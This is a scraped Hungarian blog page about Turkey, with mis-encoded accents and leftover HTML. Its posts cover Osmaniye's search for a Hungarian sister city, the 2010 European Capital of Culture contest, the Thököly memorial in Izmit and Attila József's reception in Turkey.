style="color:#ff0000;"></span></strong><div align="justify"><span style="font-size:85%;color:#ff0000;"><strong></strong></span><br /></div><div align="justify"><a href="http://torokorszag.blogspot.com/2006/01/magyar-testvrvrost-keres-osmaniye.html"><span style="font-size:85%;">Magyar testvיrvבrost keres Osmaniye</span></a><span style="font-size:85%;"> </span><span style="color:#ff0000;"><span style="font-size:85%;">J! </span><div align="justify"></div><div align="justify"><span style="font-size:85%;"></span></div><div align="justify"></div><div align="justify"><br /></div><div align="justify"><a href="http://torokorszag.blogspot.com/2005/12/trk-jdonsgok-programok-kulturlis-hrek.html"><span style="font-size:85%;">Tצrצk תjdonsבgok, programok, kulturבlis hםrek יs ajבnlatok</span></a><span style="font-size:85%;color:#ff0000;">J!</span></div><div align="justify"><span style="font-size:85%;"><br /></span></div><div align="justify"><span style="font-size:85%;color:#ff0000;"></span></div><div align="justify"><span style="color:#ff0000;"><span style="font-size:85%;color:#000000;"><a href="http://torokorszag.blogspot.com/2005/12/eurpa-kulturlis-fvrosai-2010.html">Eurףpa Kulturבlis Fővבrosai, 2010.</a></span><span style="font-size:85%;"> J!</span></span></div><div align="justify"><span style="font-size:85%;"></span></div><div align="justify"><span style="font-size:85%;color:#ff0000;"></span></div><div align="justify"><span style="font-size:85%;"><span style="color:#ff0000;"></span><br /></span></div><div align="justify"><span style="color:#ff0000;"><a href="http://torokorszag.blogspot.com/2005/12/magyar-emlkek-trkorszgban.html"><span style="font-size:85%;"><span style="color:#000000;">Magyar emlיkek Tצrצkorszבgban</span> </span></a><span style="font-size:85%;">J!</span></span></div></span></div><div align="justify"><span style="font-size:85%;"></span></div><div align="justify"><span style="font-size:85%;"></span></div><div align="justify"></div><div align="justify"></div><div align="justify"></div><div align="justify"><br /></div><div align="justify"><a href="http://torokorszag.blogspot.com/2004/07/blog-fnykpalbuma-trk-fotmvszek-lapjai.html"><span style="font-size:85%;">Flickr: Efendi fotףi Tצrצkorszבgrףl + A blog lבtogatףinak kצzצs fיnykיpalbuma </span></a><span style="font-size:85%;">... <span style="color:#ff0000;">vagy mבsfיl ezer kיp</span></span></div><div align="justify"><span style="font-size:85%;color:#ff0000;"></span></div><div align="justify"><span style="font-size:85%;color:#ff0000;"></span></div><div align="justify"><span style="color:#ff0000;"></span></div><div align="justify"><span style="color:#ff0000;"></span></div><div align="justify"><span style="color:#ff0000;"></span><br /></div><div align="justify"><span style="color:#ff0000;"><a href="http://torokorszag.blogspot.com/2004/08/ali-baba-magyar-trk-sportrovata.html"><span style="font-size:85%;">Ali Baba magyar-tצrצk sportrovata</span></a><span style="font-size:85%;"><span style="color:#000000;"> </span><span style="color:#ff0000;">Ali Baba, Laci, Borbicsek יs mבsok...</span></span></span></div><div align="justify"><span style="font-size:85%;"><br /></span></div><div align="justify"><span style="font-size:85%;color:#ff0000;"></span></div><div align="justify"><a href="http://torokorszag.blogspot.com/2004/05/trsalg.html"><span style="font-size:85%;">Tבrsalgף</span></a></div><div align="justify"><span style="font-size:85%;"><br /></span></div><div align="justify"><span style="font-size:85%;"></span></div><div align="justify"><a href="http://torokorszag.blogspot.com/2005/03/trkorszg-s-blog-bartainak-tallkozi.html"><span style="font-size:85%;">A blog יs Tצrצkorszבg barבtainak talבlkozףi</span></a><a href="http://torokorszag.blogspot.com/2004/11/sztndjjal-trkorszgba.html"></a></div><p align="justify"><span style="font-size:85%;"></span></p><p align="justify"><span style="color:#ff0000;"><a href="http://torokorszag.blogspot.com/2005/07/egy-ve-se-gyerek-se-hr-mehmet-tysz.html"><span style="font-size:85%;">Kיt יve tűnt el Mehmet Tysz Kבroly kiskorת magyar בllampolgבr</span></a><span style="font-size:85%;"> (םrבsok 2005. mבjusa utבn)</span></span></p><div align="justify"><a href="http://torokorszag.blogspot.com/2004/05/magyar-trk-kt-jbart.html"><span style="font-size:85%;">Magyar-tצrצk, kיt jףbarבt...</span></a><span style="font-size:85%;"> <span style="color:#ff0000;">a magyar-tצrצk kapcsolatokrףl...</span></span></div><div align="justify"><br /></div><div align="center"><strong><span style="color:#ff0000;">2. KULTURֱLIS ֹS MINDENFֹLE AJֱNLATOK</span></strong><br /></div><div align="justify"><br /></div><div align="justify"></div><div align="justify"></div><div align="justify"><span style="font-size:85%;"><a href="http://torokorszag.blogspot.com/2004/07/mozi-trk-filmrendezkrl-s-filmjeikrl.html">Mozi. Tצrצk rendezőkről יs filmjeikről</a> <span style="color:#ff0000;">filmek a kurd poston is vannak</span></span></div><div align="justify"></div><div align="justify"><span style="font-size:85%;"></span><br /></div><div align="justify"><span style="font-size:85%;"><a href="http://torokorszag.blogspot.com/2004/06/lemezajnl.html"><span style="font-size:85%;">Magyarorszבgon kaphatף tצrצk lemez, CD, zene</span><span style="font-size:100%;"> </span></a></span></div><p><span style="font-size:85%;"><a href="http://torokorszag.blogspot.com/2004/08/knyvajnl-germanus-gyula-flhold-fak.html"><span style="font-size:85%;">Kצnyv- Germanus Gyula תtikalandjai</a></span><span style="font-size:100%;"> </span></span></p><p><span style="font-size:85%;"><a href="http://torokorszag.blogspot.com/2005/12/jzsef-attila-trkorszgban.html">Jףzsef Attila Tצrצkorszבgban</a> <span style="color:#ff0000;">J!</span></span></p><p><span style="font-size:85%;"><a href="http://torokorszag.blogspot.com/2004/08/adorjn-imre-boldog-istenknt-lni.html"><span style="font-size:85%;">Kצnyv - Adorjבn Imre: Boldog Istenkיnt יlni</a></span><span style="font-size:100%;"> </span></span></p><p><span style="font-size:85%;"><a href="http://torokorszag.blogspot.com/2004/08/orhan-pamuk-h.html"><span style="font-size:85%;">Kצnyv - Orhan Pamuk: Hף</a></span></span><span style="font-size:100%;"> </span><span style="font-size:85%;color:#ff0000;">MֱR MAGYARUL IS!</span></p><p><span style="font-size:85%;"><a href="http://torokorszag.blogspot.com/2004/06/knyv-s-cikkajnlj-megjelensek.html"><span style="font-size:85%;">Kצnyv- יs cikkajבnlף</a></span><span style="font-size:100%;"> </span></span></p><p><span style="font-size:85%;"><a href="http://torokorszag.blogspot.com/2004/05/terebess-zsia-e-tr.html"><span style="font-size:85%;">Terebess on-line kצnyvtבr - ahol mindent megtalבlsz</a></span></span><span style="font-size:100%;"></span></p><p><span style="font-size:100%;"></span></p><p><span style="font-size:100%;"><a href="http://torokorszag.blogspot.com/2004/05/tanuljunk-trkl.html"><span style="font-size:85%;">Tanuljunk tצrצkl!</span></a> </span></p><p><span style="font-size:100%;"><a href="http://torokorszag.blogspot.com/2004/07/turkolgus-s-hungarolgus-hallgatk-fruma.html"><span style="font-size:85%;">Turkolףgus יs hungarolףgus hallgatףk fףruma /Magyar irodalom tצrצkl</span> </a></span></p><p><span style="font-size:100%;"><a href="http://torokorszag.blogspot.com/2004/11/sztndjjal-trkorszgba.html"><span style="font-size:85%;">ײsztצndםjjal Tצrצkorszבgba</span></a></span></p><p><span style="font-size:85%;">M<a href="http://torokorszag.blogspot.com/2004/08/magyar-trk-barti-trsasg.html"><span style="font-size:85%;">agyar-Tצrצk Barבti Tבrsasבg</a></span></span><span style="font-size:100%;"> </span></p><p><span style="font-size:85%;"><a href="http://torokorszag.blogspot.com/2004/09/aegee-trkorszgi-programjai.html"><span style="font-size:85%;">AEGEE (egyetemi hallgatףk eurףpai egyeslete) tצrצkorszבgi rendezvיnyei </span></a><span style="color:#ff0000;">2005. יvi programok!</span></span></p><p><span style="font-size:85%;"><a href="http://torokorszag.blogspot.com/2004/09/trk-tterem-kvz-bolt-magyarorszgon.html">Tצrצk יtterem, kבvיzף, bolt Magyarorszבgon</a><br /></span></p><p><span style="font-size:85%;"><a href="http://torokorszag.blogspot.com/2004/05/trk-fakanl.html"><span style="font-size:85%;">Tצrצk fakanבl</span></a></span><span style="font-size:100%;"> </span><span style="font-size:85%;color:#ff0000;">szבmtalan recept</span></p><p><a href="http://torokorszag.blogspot.com/2004/08/linkajnl.html"><span style="font-size:85%;">Linkajבnlף</span></a> <span style="font-size:85%;color:#ff0000;">pבr link, hogy jobb legyen az יleted</span></p><p><span style="font-size:85%;"><a href="http://torokorszag.blogspot.com/2004/08/blogajnl.html">Blogajבnlף</a></span> <span style="font-size:85%;color:#ff0000;">nיhבny צtlet a blogolבshoz</span> </p><div align="justify"></div><div align="justify"><span style="font-size:85%;"><a href="http://torokorszag.lap.hu/">torokorszag.lap.hu</a> - <span style="color:#ff0000;">kצzel 1000 tצrצk link</span></span></div><div align="center"><br /><strong><span style="color:#ff0000;">3. UTAZֱS</span></strong> </div><div align="justify"><br /><span style="font-size:85%;"><a href="http://torokorszag.blogspot.com/2004/08/terrorizmus-s-ms-veszlyek.html">Terrorizmus יs mבs veszיlyek - figyelmeztetיsek יs tanבcsok/Mi a teendő, ha bajba kerlsz</a> </span></div><div align="justify"></div><div align="justify"></div><div align="justify"></div><div align="justify"><br /></div><div align="justify"><a href="http://torokorszag.blogspot.com/2004/09/olcs-repjegy.html"><span style="font-size:85%;">Olcsף repjegy!</span></a> <span style="font-size:85%;color:#ff0000;">majdnem mindig van תj ajבnlat</span></div><div align="justify"><br /></div><div align="justify"><a href="http://torokorszag.blogspot.com/2004/05/utazsi-tancsokkedvenc-trkorszgi.html"><span style="font-size:85%;">Kedvenc tצrצkorszבgi helyeink</span></a> - <span style="font-size:85%;color:#ff0000;">az oldal lבtogatףinak ajבnlatai, tapasztalatcsere, צtletek, kיrdיsek</span> </div><p align="justify"><span style="font-size:85%;"></span></p><p align="center"><strong><span style="color:#ff0000;">4. TײRײKORSZֱGR׃L</span></strong></p><div align="center"><strong><span style="font-size:130%;"></span></strong></div><div align="justify"><a href="http://torokorszag.blogspot.com/2004/09/trkorszg-az-eurpai-uniban.html"><span style="font-size:85%;color:#000000;">Tצrצkorszבg az Eurףpai Uniףban?</span></a> </div><div align="justify"><span style="color:#ff0000;"></span><br /></div><div align="justify"></div><div align="justify"></div><div align="justify"></div><div align="justify"><span style="color:#000000;"></span></div><div align="justify"><span style="color:#000000;"></span></div><div align="justify"><span style="font-size:85%;"></span></div><div align="justify"><span style="font-size:85%;"></span></div><div align="justify"><span style="font-size:85%;"></span></div><div align="justify"><span style="font-size:85%;"></span></div><div align="justify"><span style="font-size:85%;"><a href="http://torokorszag.blogspot.com/2004/10/civil-trsadalom-trkorszgban.html">Civil tבrsadalom, NGO-k, ifjתsבgi szervezetek Tצrצkorszבgban</a></span><span style="font-size:85%;"><br /></span></div><div align="justify"><span style="font-size:85%;"></span></div><div align="justify"><span style="font-size:85%;"></span><br /></div><div align="justify"><span style="font-size:85%;"><a href="http://torokorszag.blogspot.com/2004/08/mshol-olvastuk.html"><span style="font-size:85%;">Mבshol olvastuk</span></a><span style="font-size:85%;"> -<span style="color:#ff0000;"> a legjobb םrבsok</span></span><span style="font-size:100%;color:#ff0000;"> </span></span><span style="font-size:85%;"><span style="color:#ff0000;">Tצrצkorszבgrףl<br /></span></div></span><div align="justify"></div><div align="justify"><br /></div><div align="justify"><span style="font-size:85%;"><a href="http://torokorszag.blogspot.com/2004/09/nk-helyzete-trkorszgban.html">A nők helyzete Tצrצkorszבgban</a></span> </div><div align="justify"></div><div align="justify"></div><div align="justify"></div><div align="justify"></div><span style="font-size:85%;"></span><div align="justify"><span style="font-size:85%;"></span></div><div align="justify"><span style="font-size:85%;"></span></div><div align="justify"><span style="font-size:85%;"></span></div><div align="justify"><span style="font-size:85%;"></span></div><div align="justify"><span style="font-size:85%;"></span><br /></div><div align="justify"><span style="font-size:85%;"><a href="http://torokorszag.blogspot.com/2004/05/munkallszleteurpai-unis-llsok-s.html">Munka/בllבs/zlet/ Eurףpai uniףs בllבsok יs tenderek Tצrצkorszבgban</a> </span></div><div align="justify"><span style="font-size:85%;"></span></div><span style="font-size:85%;color:#ff0000;"></span><span style="color:#ff0000;"><div align="justify"><br /></span></div><span style="font-size:85%;"><a href="http://torokorszag.blogspot.com/2004/11/kurdok-trkorszgban.html">Kurdok Tצrצkorszבgban</a> </span><br /><div align="justify"></div><div align="justify"><span style="font-size:85%;"></span><br /></div><div align="justify"><span style="font-size:85%;"><a href="http://torokorszag.blogspot.com/2004/12/kurd-linkajnl.html"><span style="color:#ff0000;"><span style="color:#000000;">Kurd linkajבnlף</span></span><br /></a></span><br /><span style="font-size:85%;"><a href="http://torokorszag.blogspot.com/2004/05/az-iszlm.html">Az iszlבm</a></span> <span style="font-size:85%;"><br /></div></span><p align="center"><strong><span style="color:#ff0000;">5. TײRײK HֱZASTֱRS</span></strong></p><div align="justify"><span style="font-size:85%;"><a href="http://torokorszag.blogspot.com/2006/01/trk-hzastrs-2006.html">Tצrצk hבzastבrs - 2006.</a> - <span style="color:#ff0000;">tanבcsok egymבsnak (a tavalyi hozzבszףlבsokat <a href="http://torokorszag.blogspot.com/2005/01/trk-hzastrs-2005.html">ITT</a>, a tavalyelőttieket </span><a href="http://torokorszag.blogspot.com/2004/05/trk-hzastrs-2004.html"><span style="color:#ff0000;">ITT</span></a><span style="color:#ff0000;"> olvashatod)</span></span></div><div align="justify"><br /></div><div align="justify"><span style="font-size:85%;"><a href="http://torokorszag.blogspot.com/2004/11/vzum-s-tartzkodsi-engedly-trk.html">Vםzum- יs tartףzkodבsi engedיly tצrצk בllampolgבroknak - tudnivalףk</a></span></div><div align="justify"><br /></div><div align="justify"><span style="font-size:85%;color:#000000;"><strong>A Magyarorszבgrףl elrabolt magyar gyermekek tצrtיnete:</strong> </span></div><p align="justify"><a href="http://torokorszag.blogspot.com/2004/08/rask-szofi-trtnete.html"><span style="font-size:85%;color:#000000;">Raskף Szofi</span></a><br /></p><p align="justify"><a href="http://torokorszag.blogspot.com/2004/08/jabb-magyar-gyermekrabls-trkorszgban.html"><span style="font-size:85%;">Tysz Mehmet Kבroly</span><span style="color:#000099;"></span></a> <span style="font-size:85%;color:#ff0000;">(םrבsok 2005. mבjusבig)</span></p> -false - - - - -Efendi - -2006-01-02T06:55:00+01:00 -2006-01-02T12:53:01Z -2006-01-02T12:53:00Z - -tag:blogger.com,1999:blog-7074887.post-113620638047470459 -Tצrצk hבzastבrs - 2006. - -
    -
    Sok lבtogatףt יrdekel a kapcsolatteremtיs lehetősיge azokkal, akiknek tצrצk barבtjuk/partnerk/hבzastבrsuk van. Ez a post az ő fףrumuk.
    -
    -
    A tavalyi kb 600 hozzבszףlבst ITT, a 2004. יvieket pedig EZEN A LINKEN olvashatod. Sok hasznos tanבcsot talבlhatsz a korבbbi יvekből, ezיrt ha תj vagy a blogon יs kיrdezni akarsz, jף, ha nagyjבbףl בtnיzed a tavaly-tavalyelőtt םrtakat, mert itt is vannak Gyakran Ismיtlődő Kיrdיsek.
    -
    -
    Azt tanבcsolom, hogy ha hozzבszףlsz, ne adj meg magadrףl sok szemיlyes adatot, elיg egy mיlcםm is ahhoz, hogy mבsok kapcsolatot teremthessenek veled. Ahogy a bevezető postban is םrtam, a blog szerkesztőjekיnt biztosםtalak arrףl, hogy a velem kצzצlt szemיlyes adataidat - hacsak arra tצrvיny nem kצtelez - senkinek nem hozom tudomבsבra.
    -
    -
    -Egy kedves magyar levelező, Ildi kיrt arra, hogy csinבljak egy kis reklבmot Gצremיben 2004. decembere vיgיn megnyitott panziףjבnak, amelyet tצrצk fיrjיvel műkצdtet. ײrצmmel teszem, nemcsak neki, bבrki mבsnak is, tehבt, mielőtt Kappadףkiבba utaznבl, keresd Ildi panziףjבt - -EZEN A LINKEN - -!
    -
    -
    -
    -
    -false -
    - - - -Efendi - -2006-01-01T23:55:00+01:00 -2006-01-04T13:59:32Z -2004-11-25T23:30:26Z - -tag:blogger.com,1999:blog-7074887.post-110142542649655316 -Magyar testvיrvבrost keres Osmaniye - -
    -
    - -Karatepe/Aslantas Neo-Hittite Open Air Museum -
    -
    -
    -
    -
    -
    -
    Magyar testvיrvבrost keres Osmaniye.
    -
    -
    -
    -
    -
    -
    -
    -
    Osmaniye tartomבny - amelynek "fővבrosבt" ugyanםgy nevezik - 1996-ban lett צnבllף, addig Adana tartomבny rיsze volt. Osmaniye vבrosa nagyjבbףl fיlתton van Adana יs Gaziantep kצzצtt, kצzel a Fצldkצzi-tenger keleti cscskיhez, az Iszkenderuni-צbצlhצz. A tartomבnyi szיkhely lakossבga kb. 200 ezer, s nagyjבbףl 250 ezren laknak צsszesen a tartomבny tצbbi teleplיsיn. Az emberek főleg a mezőgazdasבgbףl יlnek, de Osmaniyיnek jף idegenforgalmi adottsבgai vannak (hegyi turizmus, sםelיs, tenger kצzelsיge), ezeket most kezdik kihasznבlni. A vבrosban תj יs szיp művיszeti בltalבnos יs kצzיpiskola műkצdik.
    -
    -
    -
    -
    -
    -
    -
    Osmaniyיt יrintette az egykori selyemתt, de a nיmetek בltal יpםtett Isztambul-Bagdad vasתtvonal is. Toprakkale 1908-ban lיtrehozott, ma mבr hasznבlaton kםvli, impozבns vasתtבllomבsבnak יpletיt kulturבlis kצzponttב kםvבnjבk בtalakםtani, s az Bartףk Bיla nevיt viselnי. Bartףk Bיla 1936. novemberיben gyűjtצtt nיpdalokat Osmaniyיben, a kutatבs egyik helyszםne יppen Toprakkale volt. (Bartףk תtjבrףl bővebbet EZEN A LINKEN talבlsz).
    -
    -
    -
    -
    -
    -
    -
    2004 vיgיn a vבros dםszpolgבrבvב fogadta Bartףk Bיlבt. Magyar segםtsיggel megkezdődצtt a Bartףk-emlיkmתzeum lיtrehozבsa, megnyitבsבt ebben az יvben tervezik.
    -
    -
    -
    -
    -
    -
    A tartomבny gazdag tצrtיnelmi emlיkekben. Az Osmaniye melletti Kastabala (Hierapolis) az i.e. II. szבzadban hellיn vבros volt, majd a Rףmai Birodalom rיszיt kיpezte. A jelenleg ott lבthatף műemlיkek a rףmai korbףl szבrmaznak.
    -
    -
    -
    -
    -
    -
    - -Kastabala, Osmaniye -
    -
    -
    -
    -
    -
    -
    A legיrdekesebb helyszםn Karatepe/Aslantas, ahol Tצrצkorszבg első szabadtיri mתzeumבt negyven יvvel ezelőtt lיtrehoztבk. A Hettita Birodalom felbomlבsa utבn a Taurus hegysיg dיli lבbainבl lיtrejצtt hettita kirבlysבgok egyike volt a karatepei, amelyben Azatiwatis uralkodott az i.e. VIII. szבzadban. A Ceylan folyף mellett a karatepei fellegvבr - az Azatiwadaya - szabadtיri mתzeumבban, gyצnyצrű hettita szobrokat יs faragvבnyokat lבthatunk, kצztk a kirבly szobrבt is:
    -
    -
    -
    -
    -
    -
    -
    - -Karatepe/Aslantas Neo-Hittite Open Air Museum - -
    -A tצbbi karatepei fotףt EZEN A LINKEN talבlhatod!
    -
    -
    Osmaniye szeretne "testvיrvבrosi" kapcsolatokat kialakםtani Magyarorszבgon.
    -

    -
    -
    -
    -Klצnצsen ajבnlom ezt a kunsבgiak figyelmיbe. Osmaniye vבrosבban יs nיhבny kצrnyező teleplיsen ugyanis יppen a kunok Ulas tצrzsיnek egy rיsze telepedett le. Erről bővebbet olvashatsz ITT יs ITT.
    -

    -
    -
    -
    Kיrlek, segםts magyar partnert talבlni! ֹrdeklődיs esetיn megadom a tצrצk partnerek elיrhetősיgיt.
    -
    -
    -
    -
    -
    -
    - -false - - - - - -Efendi - -2005-12-18T22:06:00+01:00 -2005-12-20T22:07:34Z -2005-12-19T09:12:06Z - -tag:blogger.com,1999:blog-7074887.post-113498352697618028 -Eurףpa Kulturבlis Fővבrosai, 2010 - -
    -Pיcs fיltיkeny Isztambulra? - Magyar Rבdiף, 2005. dec. 17.
    -Nיmet, magyar, tצrצk egytt? - HVG, 2005. dec. 14.
    -A nיgy elem vבrosa - Magyar Hםrlap, 2005. dec. 13.
    -Pיcs יs Isztambul "kיz a kיzben" - Magyar Rבdiף, 2005. nov. 24.
    - -
    -ֹrthetetlen okvetetlenkedיs - vagy.hu, 2005.- okt. 18.
    -
    -Kףsa kontra Mesterhבzy Isztambulrףl - EU-vonal, 2005. okt.12.
    -
    -"Isztambul is lehet kulturבlis fővבros" - Magyar Nemzet, 2005. oktףber 11. "Az Eurףpai Uniף sebtiben hozott dצntיse יrtelmיben nem kיt, hanem hבrom „eurףpai” vבros birtokolhatja a kulturבlis fővבros cםmet. A csatlakozבsi tבrgyalבsait frissen megkezdett Tצrצkorszבggal erről mבr szerződיst is kצtצttek, יs meg is neveztיk jelצlt vבroskיnt Isztambult. Kףsa Lajos a hיt pבlyבzף magyar vבros egyike, Debrecen polgבrmesterekיnt תgy vיli, nem sportszerű, hogy a nיmet יs a magyar pבlyבzatok beadבsבt kצvetően ilyen drasztikusan vבltozik az eredeti pבlyבzati kiםrבs. A polgבrmester szerint mind a nיmet, mind a magyar pבlyבzףkat kיnyelmetlen helyzetbe hozza, hogy olyan vilבgvבrossal kell megmיrkőznik, mint a kיt kultתra יs kיt fצldrיsz hatבrבn fekvő Isztambul. Az is klצnצs, hogy teljesen szokatlan mףdon egy olyan pבlyבzatot nyitnak meg klső kandidבlף előtt, ami eddig kizבrףlag eurףpai tagorszבgok teleplיsei szבmבra volt elיrhető."
    -
    -
    -
    -
    -
    -"Kףsa: Nem europיer magatartבs" - Nיpszabadsבg, 2005. okt. 10.
    -
    -
    -
    -
    -
    -
    -A hazai pבlyבn Pיcs győzצtt - (kultתra.hu) - rיszlet az indoklבsbףl: "A tanבcsadף testlet figyelembe vette a nemzetkצzi politikai, kultתrapolitikai kontextusokat is, klצnצs tekintettel a lehetsיges nיmet partnervבrosra יs a tצrצkorszבgi Isztambul bejelentett rendezיsi szבndיkבra."
    -
    - -false - - - - -Efendi - -2005-12-13T10:46:00+01:00 -2006-01-03T13:51:16Z -2005-12-13T10:03:04Z - -tag:blogger.com,1999:blog-7074887.post-113446818417914276 -Magyar emlיkek Tצrצkorszבgban - -
    -
    Ezen a poston remיlhetőleg egyre tצbb informבciףt talבlsz majd a Tצrצkorszבgban talבlhatף magyar emlיkekről, kצtődjenek azok Bizבnchoz, az Oszmבn Birodalomhoz, vagy a mai kצztבrsasבghoz. A magyar emlיkek fotףit EZEN A LINKEN lבthatod. ֽzelםtől egy fotף a ktahyai Kossuth Mתzeumbףl:
    -
    -
    -
    - -Kossuth Mתzeum, Ktahya - -
    -
    -
    -
    - -Thצkצly utca - -
    -
    - -Magyar menekltek emlיke - -
    -
    Tasnבdi Edit, Magyar Nemzet, 2005. december 10.
    -
    -
    -
    -
    -
    A Magyar–Tצrצk Barבti Tבrsasבg megemlיkezיsre kיszlt Izmitben Thצkצly Imre halבlבnak 300. יvfordulףja alkalmבbףl. A szבndיkot felkarolta az isztambuli főkonzul, Zimborבs Gabriella, יs csatlakozott hozzב Izmit vבros, illetve Kocaeli megye vezetיse is. ֽgy a tervezett szerיny emlיktבbla helyett monumentבlis emlיkművet avathattak: gyצnyצrű feketegrבnit talapzatra helyeztיk azt a Thצkצly-cםmerrel dםszםtett magyar emlיkoszlop-tצredיket, amely 1907-ben, a hamvak hazahozatala utבn a hajdani Nikomיdia צrmיny temetőjיben felבllםtott obeliszkből megmaradt. Az תj emlיkmű mellett kיtnyelvű tבbla idיzi a hבnyatott sorsת fejedelem יs felesיge emlיkיt:„Grףf Thצkצly Imre Szletett 1657. szeptember 25-יn Kיsmבrkon (ma Szlovבkia) – meghalt 1705. szeptember 13-בn Izmitben. Magyar nagybirtokos, kuruc fővezיr, 1682-től 1685-ig Felső-Magyarorszבg, majd 1690-ben Erdיly fejedelme."
    -
    -
    -
    -
    -
    Csalבdi hagyomבnyai folytבn – hisz יdesapja, Thצkצly Istvבn is fegyverrel kzdצtt a magyar fggetlensיgיrt – korבn politikai szerepet vבllalt. A Habsburg Birodalom elleni felkelők, a bujdosףk kצzצtt tanulta ki a hadi mestersיget. Ibrahim budai pasa adta בt neki a szultבni ahdnבmיt, amelyben Felső-Magyarorszבg uralkodףjבvב nevezte ki. Ettől kezdve Felső-Magyarorszבg fejedelmיnek cםmeztette magבt. 1682. jתnius 15-יn elvette felesיgl Zrםnyi Ilonבt, I. Rבkףczi Ferenc צzvegyיt, II. Rבkףczi Ferenc vezיrlő fejedelem יdesanyjבt. Az 1699-ben megkצtצtt karlףcai bיke utבn Thצkצly Isztambulban יlt, majd 1701-ben sajבt kיrיsיre megengedtיk, hogy Izmitben telepedjיk le, ide kצvette felesיge יs mintegy 1500 hםve. Zrםnyi Ilona 1703-ban hunyt el, kיt יvvel kיsőbb a fejedelem is kצvette a halבlba. A fejedelmet 1705-ben itt temettיk el. Hamvait a magyar nemzet 1906-ban exhumבltatta יs szlővבrosבban helyeztette צrצk nyugalomra.
    -
    -
    -
    -
    -
    Az nnepיlyes avatף utבn az emlיkmű mellett תj utcanיvtבblבt helyeztek el: a vבrosrendezיsi tervek szerint a kצzeljצvőben parkosםtandף terlet szיlיn vezető תt most mבr Thצkצly nevיt viseli. Megmutattבk az תgynevezett nיmet hבzakat is, a valaha itt dolgozף szakemberek ma resen בllף villבit, amelyek kצzl bבrmelyiket felajבnlja a vבros egy Thצkצly Imre יs Zrםnyi Ilona emlיkיre berendezendő mתzeum szבmבra.
    -
    -
    -
    -
    -
    -
    Ha ez a szיp terv megvalףsul, magyar turistבk zarבndokhelyיvי vבlhat Izmit, ahogy hosszת ideje az mבr Rodostף is.
    -
    -
    -
    -
    -
    A Magyar–Tצrצk Barבti Tבrsasבg a Rodostףi Magyar Barבti Tבrsasבg tבmogatבsבval jelentette meg a II. Rבkףczi יlete יs tצrצkorszבgi emigrבciףja cםmű kיtnyelvű kצnyvet F. Tףth Tibor szerkesztיsיben, amely Balla Antal, Dבvid Gיza, Fodor Pבl, Kצpeczi Bיla, Nagy Ferenc, Somogyi Grיta, Tasnבdi Edit, Tףth Csaba יs Tףth Ferenc םrבsait tartalmazza.
    -
    - -false - - - - -Efendi - -2005-12-12T18:17:00+01:00 -2005-12-13T14:32:41Z -2005-12-13T14:30:11Z - -tag:blogger.com,1999:blog-7074887.post-113448421109144269 -Jףzsef Attila Tצrצkorszבgban - -
    -
    - -Tasnבdi Edit alבbbi םrבsa a Magyar Nemzet 2005. augusztus 13-i szבmבban jelent meg.
    -
    -
    -
    - -„Sose lףdםtott”
    Jףzsef Attila Tצrצkorszבgban: a centenבriumi יv megemlיkezיsei Isztambultףl Ankarבig
    -
    -
    -
    -Jףzsef Attila תtja Pבrizson keresztl vezetett Tצrצkorszבgba: Ataol Behramoglu francia fordםtבsokkal talבlkozik előszצr, de םgy is a kצltő hatבsa alב kerl. Ennek kצszצnhető, hogy a Militan cםmű folyףirat 1975. mבrciusi szבma 44 oldalas צsszeבllםtבst szentel a magyar kצltő bemutatבsבnak. -
    -
    -
    -
    -
    Előszףkיnt Guillevicnek Jףzsef Attilבt az első vilבghבborת, az ellenforradalom יs a fasizmus Gavroche-בnak nevező םrבsבt idיzik. Ezt Szabolcsi Miklףs tanulmבnya kצveti Jףzsef Attila יlete יs kצltיszete cםmmel. Az צsszeבllםtבs tizenhat kצltemיnnyel folytatףdik. Elsősorban azok a nagy politikai versek szerepelnek itt, amelyek indokoljבk, hogy Jףzsef Attilבt Tצrצkorszבgban gyakran „tבrsadalmi-realista” kצltőkיnt emlegetik, de helyet kap A hangyבtףl az ׃dבig nיhבny mבsfajta kצltemיny is. Az צsszeבllםtבst a kצltő יletיnek יs korבnak kronolףgiבja zבrja.
    -
    -
    -
    -
    -
    Ettől a ponttףl akarva-akaratlanul szemיlyesebb hangra kell vבltanom, hiszen az esemיnyek תgy alakultak, hogy magam is belekerltem a tצrצk versbarבtok יs Jףzsef Attila egymבsra talבlבsביrt fבradozףk csapatבba.
    -
    -
    -
    -
    -
    Kemal ײzer, a kivבlף tצrצk kצltő, akivel 1981 ףta leveleztem, Jףzsef Attila-nyersfordםtבsokat kיrt tőlem. Kצzצs munkבnk eredmיnyekיnt jelent meg 1986-ban az első צnבllף tצrצk Jףzsef Attila-kצtet, Temiz Yrekle (Tiszta szםvvel) cםmmel.
    -
    -
    -
    -
    -
    Kemal ײzer a vבlogatבshoz םrt bevezetőjיben םgy fogalmazta meg azt, hogy szבmבra mit jelent Jףzsef Attila: „Amikor Jףzsef Attila verseit a Militanban צsszegyűjtve olvastam, az יletיből versbe szűrődő elemek, kיpei, amilyenekkel korבbban soha nem talבlkoztam, kצltői vilבgבnak atmoszfיrבja nem is annyira meglepetיst, mint inkבbb fבjdalmat okoztak, s ha lehet ilyet mondani: keserű lelkesedיst. Belső rokonsבgot, יrzelmi azonosulבst יreztem. Mintha egy sebeslt ember lehelete csapott volna az arcomba. A magבrahagyottsבgnak, a nincstelensיgnek יs a homloka fיnye felragyogtatבsביrt vםvott kzdelmיnek hangtalan sikolyבval lבnggב hevlő lehelete. Mintha egy emberi sorsban a megtesteslt bבnattal kerltem volna szemtől szembe, olyan szomorתsבggal, amely mindezek ellenיre nem adja meg magבt. (…) Jףzsef Attila יlete sתlyos tצrtיnelmi korszakra esett, olyan időszakra, amikor valami vיget יrt, s mיg nem lehetett pontosan tudni, hogy mi, de valami תj kezdődצtt. Szיlsősיgekben bővelkedő, ugyanakkor hatבrozott vonalvezetיsű pבlyבt futott be. Az בtlagos vagy a kצzepes hiבnyzik ebből az יletתtbףl. ֱrvasבg, magבny, nincstelensיg, betegsיg – vיgleges minden. ֹrzיkenysיg יs szintיzis – ezzel a kיt szףval szinte צsszegezni lehet kצltיszetיt. ֹrezte a kצzelםtő תjat, יs a mבr lיtezővel szintיzisbe hozta. ֹrzיkeny volt, mert יlethalבlharcot kellett vםvnia az יrzיkenysיget szlő kצrlmיnyekkel. Szintיzist teremtett, ahogy az יletből leszűrt tudבst folyamatosan verssי szűrte.”
    -
    -
    -
    -
    -
